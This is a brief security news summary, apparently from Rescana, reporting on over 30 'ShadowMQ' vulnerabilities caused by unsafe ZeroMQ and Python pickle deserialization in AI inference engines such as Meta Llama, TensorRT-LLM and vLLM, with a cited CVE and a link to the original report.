ShadowMQ Vulnerabilities: Over 30 Critical Flaws in Meta Llama, NVIDIA TensorRT-LLM, vLLM, and Other AI Inference Engines Enable Data Theft and Remote Code Execution - Rescana
Over 30 critical "ShadowMQ" vulnerabilities, stemming from insecure ZeroMQ `recv_pyobj()` and Python `pickle` deserialization, affect leading AI inference engines such as Meta Llama LLM and NVIDIA TensorRT-LLM. These flaws enable remote code execution, data theft, and privilege escalation, with specific CVEs like CVE-2024-50050 attributed, and active exploitation has been observed.
Source: Original Report ↗